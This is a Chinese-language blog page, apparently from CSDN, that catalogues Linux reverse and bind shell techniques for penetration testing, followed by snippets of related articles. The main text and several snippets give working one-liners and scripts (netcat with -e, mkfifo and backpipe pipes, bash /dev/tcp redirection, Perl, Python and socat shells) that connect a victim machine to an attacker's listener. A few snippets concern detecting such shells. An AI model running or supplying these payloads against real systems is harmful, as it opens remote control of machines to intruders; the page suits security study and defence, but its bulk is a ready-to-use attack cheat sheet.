Linux反弹Shell总结

原创

已于 2023-04-18 16:27:30 修改 · 4.4k 阅读

6 ·

CC 4.0 BY-SA版权

文章标签：

#linux #bash #安全 #web安全

于 2022-01-06 23:34:05 首次发布

本文详细介绍了在Linux环境中实现反弹Shell的各种方法，包括使用NC正向和反向反弹，Bash，Perl，Python，PHP，Java，Ruby，Telnet以及其他如Lua，AWK，socat和curl等工具。通过这些技巧，安全人员可以更好地理解和应对潜在的安全威胁。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

反弹姿势

1、NC正向反弹

靶机：

nc -lvvp 靶机端口 -e /bin/sh

攻击机：

nc 靶机ip 靶机端口

2、NC反向反弹

（1）、可使用-e参数：

靶机：

nc x.x.x.x 8888 -e /bin/bash

攻击机：

nc -lvvp 8888

（2）、NC，无-e参数反弹shell

有些版本的NC可能不支持-e选项，不能使用-e，则：

方法一：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc x.x.x.x 8888 >/tmp/f

方法二：

mknod backpipe p; nc x.x.x.x 8888 0<backpipe | /bin/bash 1>backpipe 2>backpipe

方法三：利用管道符直接反弹：

攻击者主机上打开两个终端分别执行监听：

nc -nvlp 6666
nc -nvlp 7777

靶机上执行连接：

nc x.x.x.x 6666|/bin/bash|x.x.x.x 7777

监听两个端口分别用来输入和输出，其中x.x.x

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

千叶酱

关注关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

LinuxN种反弹shell方法

YUGUOHOU的博客

11-26

1万+

什么是反弹shell？　　反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器 (目标ip：目标机器端口），这是比较

Linux反弹Shell的多种技巧

安心写bug的博客

08-10

1311

反弹Shell（Reverse Shell）主要用来实现反向连接，突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况，这些限制使得传统的正向连接（如SSH、Telnet等）难以实现。

1 条评论您还未登录，请先登录后发表或查看评论

linux 反弹shell

weixin_30426957的博客

06-30

222

Linux下反弹shell笔记 0x00 NC命令详解在介绍如何反弹shell之前，先了解相关知识要点。 nc全称为netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流可运行在TCP或者UDP模式，添加参数 —u 则调整为udP，默认为tcp -v 参数，详细输出 n参数高数netcat不要DNS反向查询IP的域名 z参数，连接成功后立即关闭连接 ...

干货分享—Linux之渗透测试常用反弹shell方法总结！黑客技术零基础入门到精通实战教程！

白帽阿叁的博客

05-07

685

反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以想办法避开防火墙和路由的一些限制的!我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

linux检测反弹shell

weixin_43781139的博客

02-25

2654

1、bash -i >& /dev/tcp/192.168.110.78/6767 0>&1 可以看到bash -i的输入输出和错误输出全部定位到了一个socket上我们lsof看一下bash进程我们可以看到bash远程指向一个ip，那我们完全可以判定这是一个反弹shell。 2、nc -e /usr/bin/bash 192.168.110.78 6767 这里我们看到bash的输入输出都定位到了管道上，而这个管道指向父进程nc，而且这两个...

Linux下反弹shell

渗透之路，攻防之间皆学问

04-21

4419

在渗透过程中，目标处于内网环境，或因为端口限制而我们无法直连目标机器，此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell，以便继续深入。记录几个常用的。

Linux 反弹 Shell

weixin_30727835的博客

08-03

761

攻击场景 Attacker：192.168.0.106 win10 Victim：192.168.2.140 kali NC 反弹 shell Netcat简介俗称瑞士军刀或NC，小巧强悍，可以读写TCP或UDP网络连接，它被设计成一个可靠的后端工具，能被其它的程序或脚本直接地或容易地驱动。同时，nc又是一个功能丰富的网络调试和开发工具，因为它可以建立你可能用到的几乎任何...

linux反弹shell的原理详解

01-08

反弹shell命令： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell： nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...

Linux反弹shell总结与实践

不想当脚本小子的脚本小子

12-05

316

最近在学习的时候碰到了利用kali写反弹shell的操作，趁着有空的时候过来系统学习一下。给1.什么情况下需要写入反弹shell。2.如何写入反弹shell 3.反弹shell成功的原理是什么 4.反弹shell有没有什么变形。5.反弹shell有哪些方法？当我去攻击一台机器的时候，通过该机器的端口以及端口提供的服务（SSH、telnet等等）可以直接去连接到这台机器，但是如果连不上这台机器那就不如让它弹一个shell回来（可以理解为从对方的机器上拿一个控制权到自己手里），比如这个机器在内网里，...

linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell

weixin_39820136的博客

05-14

1265

用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件，wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery，详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...

linux使用nc 反弹shell

qq_30890029的博客

04-20

628

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听：nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell》

Linux下NC反弹shell命令（推荐）

09-15

主要介绍了Linux下NC反弹shell命令，非常不错，具有参考借鉴价值，需要的的朋友参考下吧

PHP脚本反弹SHELL

10-20

此脚本可以反弹SHELL到指定地址，得到交互交shell

linux反弹shell总结

redwand的博客

02-22

1534

本文总结了Linux下常用的反弹shell方式，同时说明了交互式shell的得到方法，最后积累了反弹shell语法高亮与tab自动补齐。

渗透测试Linux反弹shell

Zgnb173659的博客

08-01

1735

shell是渗透中常用的名词，如getshell、webshell、反弹shell等等，都和shell相关。在计算机科学中，shell俗称壳（用来区别于核），是指“为使用者提供操作界面”的软件（命令解析器）。类似于DOS下的command.com和后来的cmd.exe，用来接收用户命令，然后调用相应的应用程序。简单来说用户通过shell访问操作系统内核的服务，也就是由壳到内核，执行系统命令。 getshell：获取到目标的命令执行权限 webshell

nc--反弹shell

wzhua的博客

08-04

3252

nc--反弹shell，小实验

NC反弹Shell

收集盒 Book box

08-30

3027

使用NC反弹Shell 在进行Shell反弹时，有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况，例如有的服务器只支持JSP，不支持PHP。此时，可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdSh

nc的使用+反弹shell

2301_80366980的博客

02-18

1626

记录学习linux中nc的使用，以及反弹shell仅供个人学习,如有冒犯请尽快联系。

【Linux环境下的shell反弹】

qq_55213436的博客

07-05

2181

在日常的渗透测试中，当我们拿到一个目标网站的漏洞的时候，往往可以采用shell反弹的方式来进行下一步的操作。反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......

linux 反弹shell 到linux

最新发布

06-08

### 实现反弹Shell的多种方法在Linux系统中，可以从目标主机发起反弹Shell连接到另一台Linux设备。以下是几种常见的实现方式： #### 1. 使用 `bash` 发起反弹Shell 通过 `bash` 的 `/dev/tcp` 功能可以轻松实现反弹Shell。命令如下： ```bash bash -i >& /dev/tcp/目标IP/端口 0>&1 ``` 例如，如果目标Linux主机的IP地址为 `192.168.1.100`，端口为 `4444`，则命令为： ```bash bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 ``` 这会将当前主机的Shell反弹到目标Linux主机上[^2]。 #### 2. 使用 `nc`（Netcat）实现反弹Shell `nc` 是一种强大的网络工具，可以通过它实现反弹Shell。目标主机需要监听指定端口。命令如下： ```bash nc -e /bin/bash 目标IP 端口 ``` 例如： ```bash nc -e /bin/bash 192.168.1.100 4444 ``` 需要注意的是，某些系统可能禁用了 `-e` 参数，此时可以使用以下替代方案： ```bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc 目标IP 端口 > /tmp/f ``` 例如： ```bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc 192.168.1.100 4444 > /tmp/f ``` 这种方式适用于无法直接使用 `-e` 参数的情况[^5]。 #### 3. 使用 `perl` 脚本实现反弹Shell Perl 脚本也可以用于实现反弹Shell。示例代码如下： ```perl use Socket; $IP = "目标IP"; $PORT = 端口; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(SOCKET, sockaddr_in($PORT, inet_aton($IP))); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); exec("/bin/bash") or exec("/bin/sh"); ``` 例如，如果目标IP为 `192.168.1.100`，端口为 `4444`，则脚本中的 `$IP` 和 `$PORT` 需要相应设置[^1]。 #### 4. 使用 `python` 实现反弹Shell Python 提供了简洁的反弹Shell实现方式。示例代码如下： ```python import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("目标IP", 端口)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/bash", "-i"]) ``` 例如，如果目标IP为 `192.168.1.100`，端口为 `4444`，则需要替换 `"目标IP"` 和 `端口` 的值[^3]。 #### 5. 使用 `socat` 实现反弹Shell `socat` 是一种功能强大的双向通信工具，可以用来实现反弹Shell。命令如下： ```bash socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:目标IP:端口 ``` 例如： ```bash socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444 ``` 这种方式适用于支持 `socat` 的环境[^3]。 #### 6. 使用 `exec` 和重定向实现反弹Shell 通过文件描述符和重定向，可以实现更复杂的反弹Shell。示例命令如下： ```bash exec 5<>/dev/tcp/目标IP/端口; cat <&5 | while read line; do $line 2>&5 >&5; done ``` 例如： ```bash exec 5<>/dev/tcp/192.168.1.100/4444; cat <&5 | while read line; do $line 2>&5 >&5; done ``` 这种方式适用于受限环境中[^4]。 ### 注意事项 - 在目标Linux主机上需要确保目标端口已开启监听。例如，使用以下命令监听端口： ```bash nc -nvlp 端口 ``` - 确保目标主机和攻击机之间的网络是连通的。 - 不同的Linux发行版可能对某些工具的支持程度不同，请根据实际情况选择合适的工具。